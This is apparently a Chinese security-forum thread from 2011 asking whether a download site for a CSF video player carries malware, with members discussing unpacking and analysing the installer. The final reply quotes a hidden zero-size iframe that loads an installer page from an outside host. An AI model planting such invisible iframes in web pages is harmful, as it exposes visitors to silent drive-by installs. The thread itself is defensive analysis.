请问这个网站有毒吗？[正常][已检测 by 是昔流芳]

显示全部楼层 · 发表于 2011-5-7 15:04:42

本帖最后由 poochan 于 2011-5-7 15:25 编辑

RT，http://www.ouyaoxiazai.com/download/y15411.html，我点本地下载地址一和二都会被ESS阻止。另外谁可以提供一个可以在win7上用的安全的播放csf格式视频的播放器，先谢谢了。

显示全部楼层 · 发表于 2011-5-7 15:23:55

对XPlayer.exe进行了分析,正常.
未发现该页面被挂马.
不管怎样,还是去大的下载站下载较为安全.

显示全部楼层 · 发表于 2011-5-7 15:27:06

回复 2楼是昔流芳的帖子

不是kejiancsfbofangqi.exe吗？怎么是XPlayer.exe了？

显示全部楼层 · 发表于 2011-5-7 15:29:48

解压,解压,再解压,就能得到.

显示全部楼层 · 发表于 2011-5-7 20:32:32

回复 4楼是昔流芳的帖子

额，就这样检测病毒吗？！太简单了吧！

显示全部楼层 · 发表于 2011-5-7 20:41:08

回复 5楼 1109059127 的帖子

我解压是为了得到XPlayer.exe,对WINRAR的自解压文件进行分析是非常愚蠢的做法.得到这个源文件后我用IDA进行的分析,F5.
建议你好好学习一下再说这样的话.解压文件是看不出是否正常的,有时候甚至会把区段给搞出来,这是很明显的道理.

显示全部楼层 · 发表于 2011-5-7 20:51:36

回复 6楼是昔流芳的帖子

我是个小白只是问下而已！那你解压XPlayer.exe前面哪两个文件都是个壳而已吗？

显示全部楼层 · 发表于 2011-5-7 21:12:12

本帖最后由是昔流芳于 2011-5-7 21:13 编辑

回复 7楼 1109059127 的帖子

那不能说是壳,即使说它在某些方面有着压缩壳和加密壳的功能.
一般来说,壳是附加在原始程序上的,通过更改入口点使自己的代码先于原始程序运行,待对原始程序进行解密,还原之后把控制权交给原始程序,执行原程序的主函数.
我这样讲,还有一个原因是它的难度,很难说是个壳......
如果我没记错,第一层是一个WINRAR的自解压文件,可以用7-ZIP解开.
第二层是个安装程序,应该是用NSIS封装的,同样可用7-ZIP解开.
貌似还没有一种壳可以用7-ZIP直接脱掉,哪怕是UPX.

显示全部楼层 · 发表于 2011-5-19 18:57:40

本帖最后由小富队长于 2011-5-19 18:59 编辑

标题错了有自动下载这明显是病毒不正常

显示全部楼层 · 发表于 2011-5-19 19:16:01

回复 8楼是昔流芳的帖子

<iframe height="0" width="0" src="http://www.cutegenius.com/cnzzStatistics/Installer03.htm" id="cframe" title="cframe" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" name="I1">
以0高 0阔并连带安装时执行

[已鉴定] 请问这个网站有毒吗？[正常][已检测 by 是昔流芳]